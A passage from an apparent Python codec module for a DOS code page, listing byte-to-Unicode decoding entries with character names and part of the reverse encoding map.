0x00ed: 0x00dd, # LATIN CAPITAL LETTER Y WITH ACUTE
0x00ee: 0x00af, # MACRON
0x00ef: 0x00b4, # ACUTE ACCENT
0x00f0: 0x00ad, # SOFT HYPHEN
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2017, # DOUBLE LOW LINE
0x00f3: 0x00be, # VULGAR FRACTION THREE QUARTERS
0x00f4: 0x00b6, # PILCROW SIGN
0x00f5: 0x00a7, # SECTION SIGN
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x00b8, # CEDILLA
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x00a8, # DIAERESIS
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x00b9, # SUPERSCRIPT ONE
0x00fc: 0x00b3, # SUPERSCRIPT THREE
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
u'\x00' # 0x0000 -> NULL
u'\x01' # 0x0001 -> START OF HEADING
u'\x02' # 0x0002 -> START OF TEXT
u'\x03' # 0x0003 -> END OF TEXT
u'\x04' # 0x0004 -> END OF TRANSMISSION
u'\x05' # 0x0005 -> ENQUIRY
u'\x06' # 0x0006 -> ACKNOWLEDGE
u'\x07' # 0x0007 -> BELL
u'\x08' # 0x0008 -> BACKSPACE
u'\t' # 0x0009 -> HORIZONTAL TABULATION
u'\n' # 0x000a -> LINE FEED
u'\x0b' # 0x000b -> VERTICAL TABULATION
u'\x0c' # 0x000c -> FORM FEED
u'\r' # 0x000d -> CARRIAGE RETURN
u'\x0e' # 0x000e -> SHIFT OUT
u'\x0f' # 0x000f -> SHIFT IN
u'\x10' # 0x0010 -> DATA LINK ESCAPE
u'\x11' # 0x0011 -> DEVICE CONTROL ONE
u'\x12' # 0x0012 -> DEVICE CONTROL TWO
u'\x13' # 0x0013 -> DEVICE CONTROL THREE
u'\x14' # 0x0014 -> DEVICE CONTROL FOUR
u'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x0016 -> SYNCHRONOUS IDLE
u'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x0018 -> CANCEL
u'\x19' # 0x0019 -> END OF MEDIUM
u'\x1a' # 0x001a -> SUBSTITUTE
u'\x1b' # 0x001b -> ESCAPE
u'\x1c' # 0x001c -> FILE SEPARATOR
u'\x1d' # 0x001d -> GROUP SEPARATOR
u'\x1e' # 0x001e -> RECORD SEPARATOR
u'\x1f' # 0x001f -> UNIT SEPARATOR
u' ' # 0x0020 -> SPACE
u'!' # 0x0021 -> EXCLAMATION MARK
u'"' # 0x0022 -> QUOTATION MARK
u'#' # 0x0023 -> NUMBER SIGN
u'$' # 0x0024 -> DOLLAR SIGN
u'%' # 0x0025 -> PERCENT SIGN
u'&' # 0x0026 -> AMPERSAND
u"'" # 0x0027 -> APOSTROPHE
u'(' # 0x0028 -> LEFT PARENTHESIS
u')' # 0x0029 -> RIGHT PARENTHESIS
u'*' # 0x002a -> ASTERISK
u'+' # 0x002b -> PLUS SIGN
u',' # 0x002c -> COMMA
u'-' # 0x002d -> HYPHEN-MINUS
u'.' # 0x002e -> FULL STOP
u'/' # 0x002f -> SOLIDUS
u'0' # 0x0030 -> DIGIT ZERO
u'1' # 0x0031 -> DIGIT ONE
u'2' # 0x0032 -> DIGIT TWO
u'3' # 0x0033 -> DIGIT THREE
u'4' # 0x0034 -> DIGIT FOUR
u'5' # 0x0035 -> DIGIT FIVE
u'6' # 0x0036 -> DIGIT SIX
u'7' # 0x0037 -> DIGIT SEVEN
u'8' # 0x0038 -> DIGIT EIGHT
u'9' # 0x0039 -> DIGIT NINE
u':' # 0x003a -> COLON
u';' # 0x003b -> SEMICOLON
u'<' # 0x003c -> LESS-THAN SIGN
u'=' # 0x003d -> EQUALS SIGN
u'>' # 0x003e -> GREATER-THAN SIGN
u'?' # 0x003f -> QUESTION MARK
u'@' # 0x0040 -> COMMERCIAL AT
u'A' # 0x0041 -> LATIN CAPITAL LETTER A
u'B' # 0x0042 -> LATIN CAPITAL LETTER B
u'C' # 0x0043 -> LATIN CAPITAL LETTER C
u'D' # 0x0044 -> LATIN CAPITAL LETTER D
u'E' # 0x0045 -> LATIN CAPITAL LETTER E
u'F' # 0x0046 -> LATIN CAPITAL LETTER F
u'G' # 0x0047 -> LATIN CAPITAL LETTER G
u'H' # 0x0048 -> LATIN CAPITAL LETTER H
u'I' # 0x0049 -> LATIN CAPITAL LETTER I
u'J' # 0x004a -> LATIN CAPITAL LETTER J
u'K' # 0x004b -> LATIN CAPITAL LETTER K
u'L' # 0x004c -> LATIN CAPITAL LETTER L
u'M' # 0x004d -> LATIN CAPITAL LETTER M
u'N' # 0x004e -> LATIN CAPITAL LETTER N
u'O' # 0x004f -> LATIN CAPITAL LETTER O
u'P' # 0x0050 -> LATIN CAPITAL LETTER P
u'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
u'R' # 0x0052 -> LATIN CAPITAL LETTER R
u'S' # 0x0053 -> LATIN CAPITAL LETTER S
u'T' # 0x0054 -> LATIN CAPITAL LETTER T
u'U' # 0x0055 -> LATIN CAPITAL LETTER U
u'V' # 0x0056 -> LATIN CAPITAL LETTER V
u'W' # 0x0057 -> LATIN CAPITAL LETTER W
u'X' # 0x0058 -> LATIN CAPITAL LETTER X
u'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
u'Z' # 0x005a -> LATIN CAPITAL LETTER Z
u'[' # 0x005b -> LEFT SQUARE BRACKET
u'\\' # 0x005c -> REVERSE SOLIDUS
u']' # 0x005d -> RIGHT SQUARE BRACKET
u'^' # 0x005e -> CIRCUMFLEX ACCENT
u'_' # 0x005f -> LOW LINE
u'`' # 0x0060 -> GRAVE ACCENT
u'a' # 0x0061 -> LATIN SMALL LETTER A
u'b' # 0x0062 -> LATIN SMALL LETTER B
u'c' # 0x0063 -> LATIN SMALL LETTER C
u'd' # 0x0064 -> LATIN SMALL LETTER D
u'e' # 0x0065 -> LATIN SMALL LETTER E
u'f' # 0x0066 -> LATIN SMALL LETTER F
u'g' # 0x0067 -> LATIN SMALL LETTER G
u'h' # 0x0068 -> LATIN SMALL LETTER H
u'i' # 0x0069 -> LATIN SMALL LETTER I
u'j' # 0x006a -> LATIN SMALL LETTER J
u'k' # 0x006b -> LATIN SMALL LETTER K
u'l' # 0x006c -> LATIN SMALL LETTER L
u'm' # 0x006d -> LATIN SMALL LETTER M
u'n' # 0x006e -> LATIN SMALL LETTER N
u'o' # 0x006f -> LATIN SMALL LETTER O
u'p' # 0x0070 -> LATIN SMALL LETTER P
u'q' # 0x0071 -> LATIN SMALL LETTER Q
u'r' # 0x0072 -> LATIN SMALL LETTER R
u's' # 0x0073 -> LATIN SMALL LETTER S
u't' # 0x0074 -> LATIN SMALL LETTER T
u'u' # 0x0075 -> LATIN SMALL LETTER U
u'v' # 0x0076 -> LATIN SMALL LETTER V
u'w' # 0x0077 -> LATIN SMALL LETTER W
u'x' # 0x0078 -> LATIN SMALL LETTER X
u'y' # 0x0079 -> LATIN SMALL LETTER Y
u'z' # 0x007a -> LATIN SMALL LETTER Z
u'{' # 0x007b -> LEFT CURLY BRACKET
u'|' # 0x007c -> VERTICAL LINE
u'}' # 0x007d -> RIGHT CURLY BRACKET
u'~' # 0x007e -> TILDE
u'\x7f' # 0x007f -> DELETE
u'\xc7' # 0x0080 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xfc' # 0x0081 -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xe9' # 0x0082 -> LATIN SMALL LETTER E WITH ACUTE
u'\xe2' # 0x0083 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x0084 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe0' # 0x0085 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe5' # 0x0086 -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe7' # 0x0087 -> LATIN SMALL LETTER C WITH CEDILLA
u'\xea' # 0x0088 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x0089 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xe8' # 0x008a -> LATIN SMALL LETTER E WITH GRAVE
u'\xef' # 0x008b -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xee' # 0x008c -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xec' # 0x008d -> LATIN SMALL LETTER I WITH GRAVE
u'\xc4' # 0x008e -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x008f -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc9' # 0x0090 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xe6' # 0x0091 -> LATIN SMALL LIGATURE AE
u'\xc6' # 0x0092 -> LATIN CAPITAL LIGATURE AE
u'\xf4' # 0x0093 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x0094 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf2' # 0x0095 -> LATIN SMALL LETTER O WITH GRAVE
u'\xfb' # 0x0096 -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xf9' # 0x0097 -> LATIN SMALL LETTER U WITH GRAVE
u'\xff' # 0x0098 -> LATIN SMALL LETTER Y WITH DIAERESIS
u'\xd6' # 0x0099 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x009a -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xf8' # 0x009b -> LATIN SMALL LETTER O WITH STROKE
u'\xa3' # 0x009c -> POUND SIGN
u'\xd8' # 0x009d -> LATIN CAPITAL LETTER O WITH STROKE
u'\xd7' # 0x009e -> MULTIPLICATION SIGN
u'\u0192' # 0x009f -> LATIN SMALL LETTER F WITH HOOK
u'\xe1' # 0x00a0 -> LATIN SMALL LETTER A WITH ACUTE
u'\xed' # 0x00a1 -> LATIN SMALL LETTER I WITH ACUTE
u'\xf3' # 0x00a2 -> LATIN SMALL LETTER O WITH ACUTE
u'\xfa' # 0x00a3 -> LATIN SMALL LETTER U WITH ACUTE
u'\xf1' # 0x00a4 -> LATIN SMALL LETTER N WITH TILDE
u'\xd1' # 0x00a5 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xaa' # 0x00a6 -> FEMININE ORDINAL INDICATOR
u'\xba' # 0x00a7 -> MASCULINE ORDINAL INDICATOR
u'\xbf' # 0x00a8 -> INVERTED QUESTION MARK
u'\xae' # 0x00a9 -> REGISTERED SIGN
u'\xac' # 0x00aa -> NOT SIGN
u'\xbd' # 0x00ab -> VULGAR FRACTION ONE HALF
u'\xbc' # 0x00ac -> VULGAR FRACTION ONE QUARTER
u'\xa1' # 0x00ad -> INVERTED EXCLAMATION MARK
u'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2591' # 0x00b0 -> LIGHT SHADE
u'\u2592' # 0x00b1 -> MEDIUM SHADE
u'\u2593' # 0x00b2 -> DARK SHADE
u'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
u'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\xc1' # 0x00b5 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xc2' # 0x00b6 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xc0' # 0x00b7 -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xa9' # 0x00b8 -> COPYRIGHT SIGN
u'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\xa2' # 0x00bd -> CENT SIGN
u'\xa5' # 0x00be -> YEN SIGN
u'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\xe3' # 0x00c6 -> LATIN SMALL LETTER A WITH TILDE
u'\xc3' # 0x00c7 -> LATIN CAPITAL LETTER A WITH TILDE
u'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\xa4' # 0x00cf -> CURRENCY SIGN
u'\xf0' # 0x00d0 -> LATIN SMALL LETTER ETH
u'\xd0' # 0x00d1 -> LATIN CAPITAL LETTER ETH
u'\xca' # 0x00d2 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xcb' # 0x00d3 -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xc8' # 0x00d4 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\u0131' # 0x00d5 -> LATIN SMALL LETTER DOTLESS I
u'\xcd' # 0x00d6 -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0x00d7 -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0x00d8 -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2588' # 0x00db -> FULL BLOCK
u'\u2584' # 0x00dc -> LOWER HALF BLOCK
u'\xa6' # 0x00dd -> BROKEN BAR
u'\xcc' # 0x00de -> LATIN CAPITAL LETTER I WITH GRAVE
u'\u2580' # 0x00df -> UPPER HALF BLOCK
u'\xd3' # 0x00e0 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xdf' # 0x00e1 -> LATIN SMALL LETTER SHARP S
u'\xd4' # 0x00e2 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\xd2' # 0x00e3 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xf5' # 0x00e4 -> LATIN SMALL LETTER O WITH TILDE
u'\xd5' # 0x00e5 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xb5' # 0x00e6 -> MICRO SIGN
u'\xfe' # 0x00e7 -> LATIN SMALL LETTER THORN
u'\xde' # 0x00e8 -> LATIN CAPITAL LETTER THORN
u'\xda' # 0x00e9 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0x00ea -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xd9' # 0x00eb -> LATIN CAPITAL LETTER U WITH GRAVE
u'\xfd' # 0x00ec -> LATIN SMALL LETTER Y WITH ACUTE
u'\xdd' # 0x00ed -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\xaf' # 0x00ee -> MACRON
u'\xb4' # 0x00ef -> ACUTE ACCENT
u'\xad' # 0x00f0 -> SOFT HYPHEN
u'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
u'\u2017' # 0x00f2 -> DOUBLE LOW LINE
u'\xbe' # 0x00f3 -> VULGAR FRACTION THREE QUARTERS
u'\xb6' # 0x00f4 -> PILCROW SIGN
u'\xa7' # 0x00f5 -> SECTION SIGN
u'\xf7' # 0x00f6 -> DIVISION SIGN
u'\xb8' # 0x00f7 -> CEDILLA
u'\xb0' # 0x00f8 -> DEGREE SIGN
u'\xa8' # 0x00f9 -> DIAERESIS
u'\xb7' # 0x00fa -> MIDDLE DOT
u'\xb9' # 0x00fb -> SUPERSCRIPT ONE
u'\xb3' # 0x00fc -> SUPERSCRIPT THREE
u'\xb2' # 0x00fd -> SUPERSCRIPT TWO
u'\u25a0' # 0x00fe -> BLACK SQUARE
u'\xa0' # 0x00ff -> NO-BREAK SPACE
)
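# In decoding_table the position in the 256-character string is the byte
# value and the character at that position is the decoded code point.
# decode() above indexes this table directly; decoding_map is defined but
# not referenced by this module's codec classes.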
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a1: 0x00ad, # INVERTED EXCLAMATION MARK
0x00a2: 0x00bd, # CENT SIGN
0x00a3: 0x009c, # POUND SIGN
0x00a4: 0x00cf, # CURRENCY SIGN
0x00a5: 0x00be, # YEN SIGN
0x00a6: 0x00dd, # BROKEN BAR
0x00a7: 0x00f5, # SECTION SIGN
0x00a8: 0x00f9, # DIAERESIS
0x00a9: 0x00b8, # COPYRIGHT SIGN
0x00aa: 0x00a6, # FEMININE ORDINAL INDICATOR
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ac: 0x00aa, # NOT SIGN
0x00ad: 0x00f0, # SOFT HYPHEN
0x00ae: 0x00a9, # REGISTERED SIGN
0x00af: 0x00ee, # MACRON
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b3: 0x00fc, # SUPERSCRIPT THREE
0x00b4: 0x00ef, # ACUTE ACCENT
0x00b5: 0x00e6, # MICRO SIGN
0x00b6: 0x00f4, # PILCROW SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x00b8: 0x00f7, # CEDILLA
0x00b9: 0x00fb, # SUPERSCRIPT ONE
0x00ba: 0x00a7, # MASCULINE ORDINAL INDICATOR
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00bc: 0x00ac, # VULGAR FRACTION ONE QUARTER
0x00bd: 0x00ab, # VULGAR FRACTION ONE HALF
0x00be: 0x00f3, # VULGAR FRACTION THREE QUARTERS
0x00bf: 0x00a8, # INVERTED QUESTION MARK
0x00c0: 0x00b7, # LATIN CAPITAL LETTER A WITH GRAVE
0x00c1: 0x00b5, # LATIN CAPITAL LETTER A WITH ACUTE
0x00c2: 0x00b6, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x00c3: 0x00c7, # LATIN CAPITAL LETTER A WITH TILDE
0x00c4: 0x008e, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x00c5: 0x008f, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x00c6: 0x0092, # LATIN CAPITAL LIGATURE AE
0x00c7: 0x0080, # LATIN CAPITAL LETTER C WITH CEDILLA
0x00c8: 0x00d4, # LATIN CAPITAL LETTER E WITH GRAVE
0x00c9: 0x0090, # LATIN CAPITAL LETTER E WITH ACUTE
0x00ca: 0x00d2, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x00cb: 0x00d3, # LATIN CAPITAL LETTER E WITH DIAERESIS
0x00cc: 0x00de, # LATIN CAPITAL LETTER I WITH GRAVE
0x00cd: 0x00d6, # LATIN CAPITAL LETTER I WITH ACUTE
0x00ce: 0x00d7, # LATIN CAPITAL LETTER I WITH CIRCUMFLEX
0x00cf: 0x00d8, # LATIN CAPITAL LETTER I WITH DIAERESIS
0x00d0: 0x00d1, # LATIN CAPITAL LETTER ETH
0x00d1: 0x00a5, # LATIN CAPITAL LETTER N WITH TILDE
0x00d2: 0x00e3, # LATIN CAPITAL LETTER O WITH GRAVE
0x00d3: 0x00e0, # LATIN CAPITAL LETTER O WITH ACUTE
0x00d4: 0x00e2, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00d5: 0x00e5, # LATIN CAPITAL LETTER O WITH TILDE
0x00d6: 0x0099, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x00d7: 0x009e, # MULTIPLICATION SIGN
0x00d8: 0x009d, # LATIN CAPITAL LETTER O WITH STROKE
0x00d9: 0x00eb, # LATIN CAPITAL LETTER U WITH GRAVE
0x00da: 0x00e9, # LATIN CAPITAL LETTER U WITH ACUTE
0x00db: 0x00ea, # LATIN CAPITAL LETTER U WITH CIRCUMFLEX
0x00dc: 0x009a, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x00dd: 0x00ed, # LATIN CAPITAL LETTER Y WITH ACUTE
0x00de: 0x00e8, # LATIN CAPITAL LETTER THORN
0x00df: 0x00e1, # LATIN SMALL LETTER SHARP S
0x00e0: 0x0085, # LATIN SMALL LETTER A WITH GRAVE
0x00e1: 0x00a0, # LATIN SMALL LETTER A WITH ACUTE
0x00e2: 0x0083, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x00e3: 0x00c6, # LATIN SMALL LETTER A WITH TILDE
0x00e4: 0x0084, # LATIN SMALL LETTER A WITH DIAERESIS
0x00e5: 0x0086, # LATIN SMALL LETTER A WITH RING ABOVE
0x00e6: 0x0091, # LATIN SMALL LIGATURE AE
0x00e7: 0x0087, # LATIN SMALL LETTER C WITH CEDILLA
0x00e8: 0x008a, # LATIN SMALL LETTER E WITH GRAVE
0x00e9: 0x0082, # LATIN SMALL LETTER E WITH ACUTE
0x00ea: 0x0088, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x00eb: 0x0089, # LATIN SMALL LETTER E WITH DIAERESIS
0x00ec: 0x008d, # LATIN SMALL LETTER I WITH GRAVE
0x00ed: 0x00a1, # LATIN SMALL LETTER I WITH ACUTE
0x00ee: 0x008c, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x00ef: 0x008b, # LATIN SMALL LETTER I WITH DIAERESIS
0x00f0: 0x00d0, # LATIN SMALL LETTER ETH
0x00f1: 0x00a4, # LATIN SMALL LETTER N WITH TILDE
0x00f2: 0x0095, # LATIN SMALL LETTER O WITH GRAVE
0x00f3: 0x00a2, # LATIN SMALL LETTER O WITH ACUTE
0x00f4: 0x0093, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x00f5: 0x00e4, # LATIN SMALL LETTER O WITH TILDE
0x00f6: 0x0094, # LATIN SMALL LETTER O WITH DIAERESIS
0x00f7: 0x00f6, # DIVISION SIGN
0x00f8: 0x009b, # LATIN SMALL LETTER O WITH STROKE
0x00f9: 0x0097, # LATIN SMALL LETTER U WITH GRAVE
0x00fa: 0x00a3, # LATIN SMALL LETTER U WITH ACUTE
0x00fb: 0x0096, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x00fc: 0x0081, # LATIN SMALL LETTER U WITH DIAERESIS
0x00fd: 0x00ec, # LATIN SMALL LETTER Y WITH ACUTE
0x00fe: 0x00e7, # LATIN SMALL LETTER THORN
0x00ff: 0x0098, # LATIN SMALL LETTER Y WITH DIAERESIS
0x0131: 0x00d5, # LATIN SMALL LETTER DOTLESS I
0x0192: 0x009f, # LATIN SMALL LETTER F WITH HOOK
0x2017: 0x00f2, # DOUBLE LOW LINE
